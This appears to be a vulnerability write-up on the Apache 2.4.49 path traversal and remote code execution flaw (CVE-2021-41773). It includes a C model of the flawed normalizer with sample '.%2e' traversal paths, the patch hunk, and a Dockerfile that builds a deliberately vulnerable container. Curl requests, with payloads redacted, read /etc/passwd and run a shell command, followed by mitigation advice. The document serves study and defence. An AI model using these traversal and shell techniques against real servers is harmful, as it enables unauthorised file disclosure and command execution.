Overview

Apache HTTP Server 2.4.49 has a path traversal vulnerability (CVE-2021-41773).

In addition, if mod_cgi is enabled, the same flaw allows remote code execution.

Scope of impact

Only version 2.4.49 is affected.

A server is only exploitable if httpd.conf does not deny access to the filesystem root, i.e. with either of the following:

<Directory />
    Require all granted
</Directory>

or

<Directory />
    #Require all denied
</Directory>

Patch

The changed code can be seen by reading the fix commit; the relevant function is ap_normalize_path, which decodes percent-encoded unreserved characters and collapses dot segments.
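To make the bug concrete before looking at the hunk, here is a reduced model of the normalizer written for this write-up (it is not httpd's code). It keeps only the %2e/%2E decoding and the removal of "/./" and "/xx/../" segments, drops slash merging and the other flags, and takes a fixed flag that switches between the 2.4.49 check (second dot must be literal) and the patched check (second dot may still be "%2e"). The sample paths such as /a/b/.%2e/.%2e/etc/passwd are constructed for the demonstration.

```c
/*
 * Reduced model of httpd's ap_normalize_path() around CVE-2021-41773.
 * Added example for this write-up, not code from httpd.  It keeps only:
 *   - decoding of a percent-encoded period (%2e / %2E) into '.', done at
 *     the current read position, as the real decode_unreserved pass does;
 *   - removal of "/./" and "/xx/../" segments.
 * Slash merging and the other AP_NORMALIZE_* flags are left out.
 */
#include <stdio.h>
#include <string.h>

#define IS_SLASH_OR_NUL(c) ((c) == '/' || (c) == '\0')

/* True if p points at "%2e" or "%2E" (a percent-encoded period). */
static int is_pct_dot(const char *p)
{
    return p[0] == '%' && p[1] == '2' && (p[2] == 'e' || p[2] == 'E');
}

/*
 * Normalize an absolute path in place.
 *   fixed == 0 : 2.4.49 behaviour, the ".." check needs a literal second dot
 *   fixed != 0 : patched behaviour, the second dot may still be "%2e"
 * Returns 0 if the path tried to climb above "/", 1 otherwise.
 */
static int normalize_path(char *path, int fixed)
{
    size_t l = 1, w = 1;   /* read and write positions, past the leading '/' */
    int ret = 1;

    if (path[0] != '/') {
        return 0;
    }

    while (path[l] != '\0') {
        /* Decode %2e in place and make the decoded '.' the current
         * character.  Only this one encoded dot is decoded before the
         * segment checks below run; a following %2e is still "%2e". */
        if (is_pct_dot(&path[l])) {
            l += 2;
            path[l] = '.';
        }

        if (path[w - 1] == '/' && path[l] == '.') {   /* segment starts with '.' */
            size_t n = l + 1;
            int dotdot = 0;

            /* "/./" segment: skip it */
            if (IS_SLASH_OR_NUL(path[n])) {
                l = n;
                if (path[l]) {
                    l++;
                }
                continue;
            }

            /* "/../" segment: literal second dot, or "%2e" when fixed */
            if (path[n] == '.') {
                dotdot = 1;
            }
            else if (fixed && is_pct_dot(&path[n])) {
                n += 2;         /* n now indexes the 'e' / 'E' */
                dotdot = 1;
            }
            if (dotdot && IS_SLASH_OR_NUL(path[n + 1])) {
                /* Wind w back to drop the previous segment */
                if (w > 1) {
                    do {
                        w--;
                    } while (w > 1 && path[w - 1] != '/');
                }
                else {
                    ret = 0;    /* already at "/", nothing to remove */
                }
                l = n + 1;      /* move l past ".." and its slash */
                if (path[l]) {
                    l++;
                }
                continue;
            }
            /* Otherwise this is treated as an ordinary segment that
             * happens to start with '.', e.g. ".%2e" in unfixed mode:
             * the dot is copied through and the traversal survives. */
        }

        path[w++] = path[l++];
    }
    path[w] = '\0';
    return ret;
}

/* Copy `in` to a static buffer, normalize it and return the result, or
 * NULL when the normalizer rejected the path for climbing above "/". */
static const char *normalize_static(const char *in, int fixed)
{
    static char buf[256];

    if (strlen(in) >= sizeof buf) {
        return NULL;
    }
    strcpy(buf, in);
    return normalize_path(buf, fixed) ? buf : NULL;
}

int main(void)
{
    /* Constructed sample paths; the traversal form mirrors "/xx/.%2e/"
     * from the patch comment, climbing out of /a/b towards /etc/passwd. */
    static const char *samples[] = {
        "/a/b/.%2e/.%2e/etc/passwd",
        "/a/b/%2e%2e/%2E%2E/etc/passwd",
        "/a/b/%2e./%2e./etc/passwd",
        "/a/b/../c/./d",
    };
    size_t i;

    for (i = 0; i < sizeof samples / sizeof samples[0]; i++) {
        char old[256], patched[256];
        const char *r;

        r = normalize_static(samples[i], 0);
        snprintf(old, sizeof old, "%s", r ? r : "(rejected)");
        r = normalize_static(samples[i], 1);
        snprintf(patched, sizeof patched, "%s", r ? r : "(rejected)");
        printf("%-32s 2.4.49: %-24s patched: %s\n", samples[i], old, patched);
    }
    return 0;
}
```

With fixed set to 0 the normalizer decodes each %2e into a dot, but because the check at the start of the segment still sees a '%' in second position it never treats the segment as "..": the dots are copied through and /a/b/.%2e/.%2e/etc/passwd comes out as /a/b/../../etc/passwd, which the later filesystem mapping resolves as a real traversal. The same input with fixed set to 1 collapses to /etc/passwd. Note the asymmetry of the old code: %2e. is collapsed (the first dot is decoded before the check runs) while .%2e and %2e%2e are not.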

Particular attention should be paid to this hunk:

@@ -568,8 +569,17 @@ AP_DECLARE(int) ap_normalize_path(char *path, unsigned int flags)
                     continue;
                 }

-                /* Remove /xx/../ segments */
-                if (path[l + 1] == '.' && IS_SLASH_OR_NUL(path[l + 2])) {
+                /* Remove /xx/../ segments (or /xx/.%2e/ when
+                 * AP_NORMALIZE_DECODE_UNRESERVED is set since we
+                 * decoded only the first dot above).
+                 */
+                n = l + 1;
+                if ((path[n] == '.' || (decode_unreserved
+                                        && path[n] == '%'
+                                        && path[++n] == '2'
+                                        && (path[++n] == 'e'
+                                            || path[n] == 'E')))
+                        && IS_SLASH_OR_NUL(path[n + 1])) {
                     /* Wind w back to remove the previous segment */
                     if (w > 1) {
                         do {
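Review bot: the new condition at `path[n] == '%' && path[++n] == '2' && (path[++n] == 'e' || path[n] == 'E')` matches exactly one layer of percent-encoding, so it closes the `.%2e` case the comment describes but still treats the segment as ordinary whenever the second dot is encoded in a form the single decode pass above did not reduce to a literal `%2e` (an encoded percent sign, for instance); a more robust shape is to fully decode the segment once and compare the result against "." and "..", rather than special-casing encoded spellings at the comparison. Minor: the `++n` side effects buried in the `&&`/`||` chain depend on short-circuit order and are easy to misread; a small `is_encoded_dot()` helper that returns how far to advance would keep `IS_SLASH_OR_NUL(path[n + 1])` readable.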

Proof

The sed line below makes the configuration vulnerable by deleting the two directives inside the default <Directory /> block.

In the stock httpd.conf of this image the <Directory /> block occupies lines 248 to 251, so deleting lines 249 and 250 removes AllowOverride none and Require all denied and leaves an empty block (the second vulnerable variant shown above).

FROM httpd:2.4.49

# Drop the two directives inside <Directory />, leaving the filesystem root unrestricted
RUN sed -i '249,250d' /usr/local/apache2/conf/httpd.conf

Build and run the vulnerable container:

$ docker image build -t cve-2021-41773 .
Sending build context to Docker daemon  26.62kB
Step 1/2 : FROM httpd:2.4.49
 ---> e91425f38618
Step 2/2 : RUN sed -i '249,250d' /usr/local/apache2/conf/httpd.conf
 ---> Running in f7f9a08201db
Removing intermediate container f7f9a08201db
 ---> d0b816039eb3
Successfully built d0b816039eb3
Successfully tagged cve-2021-41773:latest
$ docker run -t --rm -d -p 80:80 cve-2021-41773
84e7ce37c553736de7210c28e6fb5219ed72e05b8f63343df11a0fb7cfff7929
$ docker ps
CONTAINER ID   IMAGE            COMMAND              CREATED         STATUS         PORTS                NAMES
84e7ce37c553   cve-2021-41773   "httpd-foreground"   4 seconds ago   Up 3 seconds   0.0.0.0:80->80/tcp   zen_mendel

Send a request whose URL path contains the traversal sequence. The exact request is redacted here:

$ curl "http://localhost:80/**redacted**/etc/passwd"
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin

Oops, I saw something I shouldn’t have seen…

RCE

With mod_cgi enabled, the same traversal can reach /bin/sh from the CGI script directory, and the POST body is handed to the shell on stdin. The server answers 500 because the shell's output does not form a valid CGI response, but the command has already executed, as the file written to /tmp shows:

$ curl --data "*******************" http://localhost:80/******************************************/bin/sh
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>500 Internal Server Error</title>
</head><body>
<h1>Internal Server Error</h1>
<p>The server encountered an internal error or
misconfiguration and was unable to complete
your request.</p>
<p>Please contact the server administrator at
 you@example.com to inform them of the time this error occurred,
 and the actions you performed just before this error.</p>
<p>More information about this error may be available
in the server error log.</p>
</body></html>
$ docker exec -t amazing_hawking cat /tmp/id
uid=1(daemon) gid=1(daemon) groups=1(daemon)

;)

Mitigation

Upgrading is the real fix (to 2.4.51 or later: the fix shipped in 2.4.50 was incomplete, and the bypass was assigned CVE-2021-42013). If you cannot upgrade immediately, restoring the default deny on the filesystem root removes the condition the traversal relies on, although this is a mitigation rather than a guaranteed fix:

<Directory />
    Require all denied
</Directory>

Furthermore, mod_cgi should not be enabled on this version, since it turns the traversal into code execution.